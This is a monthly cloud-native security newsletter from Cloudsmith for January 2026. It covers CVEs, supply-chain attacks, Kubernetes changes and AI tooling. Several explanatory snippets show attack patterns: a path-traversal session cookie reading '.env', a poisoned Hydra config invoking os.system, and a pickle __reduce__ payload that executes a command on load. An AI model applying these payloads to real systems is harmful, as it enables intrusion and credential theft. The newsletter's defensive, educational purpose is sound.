Cloud-Native Digest is your monthly overview of all things open-source, supply chain security, and more

Edition: January 2026

 

Brought to you by Nigel Douglas, Head of Developer Relations at Cloudsmith.

 

New year, new monthly cloud-native digest to read. This month, the honeymoon period of 2026 is officially over as we track a massive surge in automated botnet activity and the "Ni8mare" RCE targeting the n8n automation platform. The industry is also grappling with verification debt as AI-generated code floods our repos, while Kubernetes 1.35 introduces much-needed guardrails for kubeconfig exec plugins. From the industrialisation of npm attacks to SBOMs for AI models, we’ve got a packed edition to keep your supply chain secure.

VULN ROUND-UP

 

Common Vulnerabilities & Exposures

Critical React Router vulnerability lets attackers access and modify server files
NVD: CVE-2025-61686

The only CVE that crept in from December, this critical (CVSS 9.1) vulnerability affects specific versions of the React Router and Remix Node-based packages. It occurs when the server fails to properly sanitise session IDs, allowing an attacker to manipulate the ID so it references local server files instead of standard session data. If the targeted file (such as a .env or credential file) matches the expected session format, the server loads its contents into the session object, potentially exposing sensitive system information through the application's UI or internal logic.
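To make the mechanics concrete, here’s a purely illustrative sketch of this class of attack – not the actual CVE-2025-61686 exploit. The endpoint, cookie name, and payload below are all assumptions for demonstration only:

    import requests

    # A path traversal string supplied where the server expects an
    # opaque session ID; a vulnerable server may resolve it to a file.
    session_id = "../../../.env"

    resp = requests.get(
        "https://app.example.com/dashboard",  # hypothetical target
        cookies={"__session": session_id},    # cookie name is an assumption
        timeout=10,
    )
    # If vulnerable, leaked file contents can surface wherever the
    # application renders session data.
    print(resp.status_code, resp.text[:200])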

 

Ni8mare – Unauthenticated Remote Code Execution in n8n
NVD: CVE-2026-21858 & CVE-2026-21877

A critical (CVSS 10.0) vulnerability, dubbed "Ni8mare", has been discovered in n8n, a popular workflow automation platform. The flaw allows unauthenticated attackers to achieve full Remote Code Execution (RCE) by exploiting a Content-Type confusion bug in Form Webhooks. By sending crafted requests, attackers can bypass authentication, read sensitive files, and steal credentials or API keys, potentially compromising over 100,000 self-hosted instances. Users are urged to upgrade to version 1.121.3 or later immediately, restrict public exposure of webhooks, and rotate any stored credentials to mitigate the risk of a full system takeover.

 

Vulnerability in Uni2TS – AI/ML Open Source Libraries
NVD: CVE-2026-22584

Vulnerabilities in popular AI and ML Python libraries used in Hugging Face models with tens of millions of downloads allow remote attackers to hide malicious code in metadata; the code then executes automatically when files containing the poisoned metadata are loaded. The open source libraries – Uni2TS, NeMo, and FlexTok – were created by Salesforce, Nvidia, and Apple working with the Swiss Federal Institute of Technology's Visual Intelligence and Learning Lab (EPFL VILAB), respectively. All three libraries use Hydra, another Python library, maintained by Meta and commonly used as a configuration management tool for machine learning projects. Specifically, the vulnerabilities involve Hydra's instantiate() function.
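The attack surface is easier to see in code. Hydra's instantiate() treats a _target_ key in a config as a dotted path to import and call, so any metadata that reaches it unvalidated becomes code execution. A minimal sketch, with a harmless echo standing in for attacker-controlled code:

    from hydra.utils import instantiate

    # A config dict of the shape instantiate() expects; if poisoned
    # metadata flows here, _target_ can name any importable callable.
    poisoned_cfg = {
        "_target_": "os.system",    # resolved and imported by Hydra
        "_args_": ["echo pwned"],   # positional args for the call
    }

    instantiate(poisoned_cfg)  # effectively runs os.system("echo pwned")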

Deserialisation of Untrusted Data in fickling
NVD: CVE-2026-22607

This critical CVE in fickling allows deserialisation of untrusted data via Python's cProfile.run function. Because the tool may misclassify malicious pickle files as "SUSPICIOUS" rather than blocking them, an attacker can bypass security checks to execute arbitrary code. The flaw abuses the deserialisation process (the conversion of byte streams back into objects), letting attackers hijack the application's execution flow with a specially crafted file.
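For context on why this bug class is so dangerous, here is a stdlib-only demonstration of how pickle hands execution flow to whoever crafted the file; the fickling check at the end follows the project's README and is worth verifying against your installed version:

    import pickle

    class Exploit:
        # __reduce__ tells the unpickler how to rebuild the object;
        # returning (os.system, ...) makes "rebuilding" run a command.
        def __reduce__(self):
            import os
            return (os.system, ("echo pwned",))

    payload = pickle.dumps(Exploit())
    pickle.loads(payload)  # executes the command during deserialisation

    # Static analysis with fickling (API per its README; verify locally):
    # import fickling
    # fickling.is_likely_safe("model.pkl")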

 

Mass exploitation through RondoDox Botnet

NVD: CVE-2025-37164

The inclusion of this CVE in CISA’s KEV catalogue highlights a critical escalation in threats against HPE OneView; the flaw carries the maximum CVSS score of 10.0. The RondoDox botnet weaponised this unauthenticated RCE, which affects all software versions prior to 11.0, in a massive, automated exploit campaign. Check Point reported a surge of over 40,000 attack attempts within a single 4-hour window on Jan. 7, 2026, primarily originating from a suspicious Dutch IP address and targeting government, financial, and manufacturing sectors globally.

IN THE NEWS

 

CI/CD Security

GCVE: EU-led alternative to MITRE's vulnerability tracking scheme

Source: ITPro

The Global CVE system (GCVE for short), operated by CIRCL, is a decentralised and scalable framework for vulnerability identification designed to complement the traditional CVE system. By authorising independent GCVE Numbering Authorities (GNAs) to allocate their own identifiers (formatted as GCVE-<GNA-ID>-<YEAR>-<ID>), the system eliminates the bottlenecks of centralised block distribution and allows entities like CSIRTs, vendors, and researchers to operate under their own disclosure policies. GCVE remains fully backward-compatible with legacy CVEs through GNA ID 0, offering a community-driven registry that enhances global CVE autonomy.
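Since the identifier grammar is so simple, tooling can adopt it in a few lines. A quick sketch of a parser for the format quoted above (the example ID reuses this month's React Router CVE via GNA ID 0):

    import re

    # GCVE-<GNA-ID>-<YEAR>-<ID>; GNA ID 0 is reserved for legacy CVEs,
    # so GCVE-0-2025-61686 refers to the same entry as CVE-2025-61686.
    GCVE_RE = re.compile(r"^GCVE-(?P<gna>\d+)-(?P<year>\d{4})-(?P<id>\d+)$")

    def parse_gcve(identifier: str) -> dict:
        match = GCVE_RE.match(identifier)
        if match is None:
            raise ValueError(f"not a GCVE identifier: {identifier}")
        return {key: int(value) for key, value in match.groupdict().items()}

    print(parse_gcve("GCVE-0-2025-61686"))  # {'gna': 0, 'year': 2025, 'id': 61686}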

SBOMs in 2026: Some Love, Some Hate, Much Ambivalence
Source: DarkReading

SBOMs have transitioned from a theoretical concept to a regulatory necessity, driven by mandates like the US Executive Order 14028 and the EU Cyber Resilience Act. While industry leaders have integrated SBOMs with SLSA frameworks to ensure build integrity, widespread efficacy is hindered by incomplete data from open-source projects and a tendency for companies to treat them as "check-the-box" compliance tasks rather than security tools. Critics argue that SBOMs generated late in the lifecycle often lack accuracy and context.

 

Malware Peddlers Are Now Hijacking Snap Publisher Domains

Source: Alan Pope's Blog

There’s a relentless campaign by scammers to publish malware in the Canonical Snap Store. Some uploads get caught by automated filters, but plenty slip through. Recently, these miscreants changed tactics – they’re now registering expired domains belonging to legitimate snap publishers, taking over their accounts, and pushing malicious updates to previously trustworthy applications. This is a significant escalation.

 

From typos to takeovers: Inside the industrialisation of npm supply chain attacks
Source: InfoWorld

The threat landscape for the npm ecosystem has undergone a fundamental shift from simple typosquatting to sophisticated, credential-driven supply chain attacks that exploit the high-trust environment of DevOps. By compromising maintainer accounts and targeting CI/CD pipelines rather than individual laptops, attackers can quietly inherit legitimate authority to distribute malware through trusted updates, reaching millions of downstream users.

Kubernetes

AI and Cloud-Native technologies are transforming the landscape
Source: CNCF Blog

The convergence of AI and cloud-native architectures is creating a powerful synergy that transforms rigid infrastructures into intelligent, self-healing ecosystems. By integrating AI with orchestration tools like K8s, DevOps teams are moving beyond static, rule-based scaling toward predictive resource management and automation, significantly reducing costs and downtime. While AI provides the brain for proactive optimisation and enhanced security, cloud-native environments offer the muscle, providing the scalability, portability, and GPU management required to train and deploy complex models at scale.

 

K8s v1.35: Restricting executables invoked by kubeconfigs via exec plugin allowlist
Source: Kubernetes Blog

The latest version of Kubernetes introduces a new security feature to mitigate risks associated with kubeconfig exec plugins, which can silently execute malicious code during authentication. By adding credentialPluginPolicy and credentialPluginAllowlist to the kuberc config file, users can now restrict which executables kubectl is permitted to run. This beta feature allows administrators to set global policies (such as DenyAll to block all plugins, or Allowlist to specify trusted binaries by name or full path), providing a critical defence against supply-chain attacks targeting credential-fetching scripts.
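As a rough sketch of what this looks like in practice, the kuberc entry below uses the field names from the blog post; the feature is beta and the surrounding schema here is an assumption, so check the v1.35 docs before copying it:

    # ~/.kube/kuberc -- field names per the Kubernetes blog post; the
    # apiVersion/kind and list layout are assumptions.
    apiVersion: kubectl.config.k8s.io/v1beta1
    kind: Preference
    credentialPluginPolicy: Allowlist      # or DenyAll to block every plugin
    credentialPluginAllowlist:
      - name: gke-gcloud-auth-plugin       # trusted binary, by name or full path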

 

Cloud Native Live: The CNCF Annual Cloud-Native Survey (Infrastructure of AI's Future)
Source: CNCF Community Groups

Join this live discussion unpacking the findings from the CNCF’s annual survey: The Infrastructure of AI's Future, built from open, community-sourced data across industries and regions. Hilary Carter, Jan-Erik Aase, and Jeffrey Sica will explore what the data reveals about Kubernetes in production, infrastructure maturity, and the evolving role of people and culture in cloud-native and AI adoption. Hear expert insights, real-world implications, and what these trends mean for the future of modern infrastructure. The live session will be followed by a Q&A, so bring your questions!

 

How Kubernetes Broke the AWS Cloud Monopoly
Source: TheNewStack

In a recent interview, Bryan Cantrill argues that the release of Kubernetes was the pivotal catalyst that broke the AWS monopoly by offering companies cloud neutrality. Prior to 2014, AWS dominated the market through relentless execution and proprietary APIs that created significant vendor lock-in. By providing a standard, open-source orchestration layer, Kubernetes allowed developers to build applications that could run on any provider, effectively enabling the rise of Azure, GCP, and the multi-cloud era. While AWS remains a market leader, Cantrill suggests that Kubernetes democratised the infrastructure landscape, shifting the industry away from a single-provider market toward a more competitive, trillion-dollar ecosystem.

AI, LLMs & MCP

HuggingHugh: Free security dashboard for AI models
Source: HuggingHugh

HuggingHugh provides SBOM reports for the most popular models on the Hugging Face Hub. Think of it as nutrition labels for AI models: just as food labels help you make informed dietary choices, HuggingHugh surfaces the dependencies, vulnerabilities, and licences involved before you integrate a model into your project.

 

Open Responses: What you need to know
Source: HuggingFace

Hugging Face, in collaboration with the open-source community, has announced Open Responses, a new open inference standard designed to replace the aging "Chat Completion" format. Based on OpenAI’s 2025 Responses API, this standard is specifically built for the agentic era, where AI systems autonomously reason, plan, and execute multi-step tasks. Open Responses introduces a unified way to handle text, images, and structured data while formalising subagent loops that allow models to call tools and process results internally in a single request. By offering standard model parameters and expanded visibility into reasoning traces, Hugging Face aims to provide a consistent, interoperable framework for developers and providers to build more complex AI agents.
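For a feel of the shape of the standard, here’s a hedged sketch of a Responses-style call. The endpoint, model name, and field set mirror OpenAI’s public Responses API; treat them as assumptions about any particular Open Responses implementation:

    import requests

    resp = requests.post(
        "http://localhost:8000/v1/responses",  # hypothetical local endpoint
        json={
            "model": "my-local-model",         # placeholder model name
            "input": "Plan a three-step refactor and call tools as needed.",
        },
        timeout=30,
    )
    # Responses-style payloads return typed output items (text, tool
    # calls, reasoning traces) rather than a single chat message.
    print(resp.json())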

 

Honeypots detect threat actors mass scanning LLM infrastructure
Source: SCMedia

Recent data from GreyNoise reveals a significant surge in targeted reconnaissance against Large Language Model (LLM) infrastructure, highlighted by a massive scanning campaign that recorded over 91,000 attack sessions between late 2025 and early 2026. This activity (largely driven by just two high-volume IP addresses) systematically probed more than 73 different model endpoints, including major platforms like OpenAI, Google Gemini, and Anthropic, to identify misconfigured servers leaking API access. A separate grey-hat operation exploited Ollama’s model-pull functionality to conduct Server-Side Request Forgery (SSRF) attacks.

 

Powerful local AI automations with n8n, MCP and Ollama
Source: KDnuggets

The setup combines Ollama for executing local LLMs (e.g. Llama 3), n8n for workflow automation, and an MCP server to bridge the LLM and custom external tools. This practical guide outlines the configuration of an MCP server and its connection to n8n, allowing a local AI model to execute real-world automations like sending emails or interacting with various APIs. The methodology also champions privacy, cost reduction, and greater control over LLMOps by keeping both models and workflow processing local.
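To show how small the MCP side of this can be, here’s a minimal tool server sketch using the official Python SDK’s FastMCP helper; the tool itself is a placeholder for real automation like the email example above:

    from mcp.server.fastmcp import FastMCP

    mcp = FastMCP("local-tools")

    @mcp.tool()
    def send_email(to: str, subject: str, body: str) -> str:
        """Placeholder tool; swap in a real SMTP call for production."""
        return f"queued email to {to} with subject {subject!r}"

    if __name__ == "__main__":
        mcp.run()  # serves the tool over stdio by default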

 

Making (Very) Small LLMs Smarter
Source: Docker Blog

Philippe, a Principal Solutions Architect at Docker, demonstrates how to effectively use Small Language Models (SLMs) locally for specialised tasks like code generation. By leveraging Retrieval-Augmented Generation (RAG), he overcomes the inherent limitations of small models (0.5B to 7B parameters), which typically lack knowledge of niche or recent projects such as his Golang library, Nova. Using tools like Docker Model Runner, LangchainJS, and Qwen2.5-Coder, Philippe shows that by splitting docs into chunks and storing them in an in-memory vector database, a local LLM can provide accurate, context-aware code snippets while maintaining data privacy and working offline.
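The core retrieval loop is simple enough to sketch with nothing but the standard library; word-overlap scoring stands in for the real embedding model and vector store, and the chunk text is invented for illustration:

    from collections import Counter

    # Invented documentation chunks standing in for real split docs.
    chunks = [
        "Install the library with: go get github.com/example/nova",
        "Handlers are registered on the router before calling Run().",
        "Qwen2.5-Coder is a small code-generation model.",
    ]

    def overlap(query: str, chunk: str) -> int:
        q, c = Counter(query.lower().split()), Counter(chunk.lower().split())
        return sum((q & c).values())  # crude stand-in for cosine similarity

    query = "how do I install the library"
    best = max(chunks, key=lambda chunk: overlap(query, chunk))
    prompt = f"Answer using only this context:\n{best}\n\nQuestion: {query}"
    print(prompt)  # this augmented prompt is what the local SLM receives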

 

Why CVEs Belong in Frameworks and Apps, Not AI Models
Source: Nvidia Developer Blog

While the CVE system is the global standard for cataloguing software flaws, applying it to individual AI models is generally a scope error. Most AI-related risks (such as adversarial prompts, data leakage, and statistical biases) are inherent properties of machine learning, or failures of the surrounding application and framework, rather than discrete, patchable bugs in the model weights themselves. The CVE framework is designed for actionable, fixable weaknesses in code; security efforts should therefore focus on patching the software layers that serve the models and on using supply-chain integrity tools to verify data, rather than labelling every statistical behaviour as a model-level CVE.

COMMUNITY

 

Events & Meet-ups

How to securely source your LLM models from Hugging Face

Date/Time: February 5, 2026 (4pm GMT)

Location: Virtual Webinar

 

Open model ecosystems like Hugging Face have transformed how teams build with AI. But with that speed comes risk: unverified publishers, dependency confusion, and models that change beneath your feet. If you’re pulling models straight into production pipelines, you’re importing all the uncertainty of the public internet into some of your most sensitive systems. In this live session, Cloudsmith experts will show you how to take control of your AI supply chain. You’ll learn how to securely ingest, verify, and distribute LLM models from Hugging Face without slowing your teams down.

 

ContainerDays London 2026
Date/Time: February 11-12, 2026
Location: The Truman Brewery, London, United Kingdom


If you’re in the area, I’ll be delivering two sessions on Kubernetes supply chain security:

1. Using the OpenSSF Malicious Packages project to identify malware in running containers
2. Fantastic Exploits and Where to Find Them

 

The Cloudsmith team will also be around to chat about all things related to secure artifact management.


KubeCon + CloudNativeCon Europe 2026
Date/Time: March 23-26, 2026
Location: RAI Amsterdam, The Netherlands


The Cloud Native Computing Foundation’s flagship conference brings together adopters and technologists from leading open source and cloud native communities in Amsterdam. Be a part of the conversation as CNCF Graduated, Incubating, and Sandbox Projects unite for four days of collaboration, learning, and innovation to drive the future of cloud native computing. We’ll also be running another exciting Capture The Flag (CTF) event.

Signed, sealed, and delivered - see you next issue.

Nigel Douglas

Head of Developer Relations

Cloudsmith

Cloudsmith, 7 Donegall Square West, Belfast, Northern Ireland BT1 6JH

Unsubscribe Manage preferences

LinkedIn
X
Instagram
Website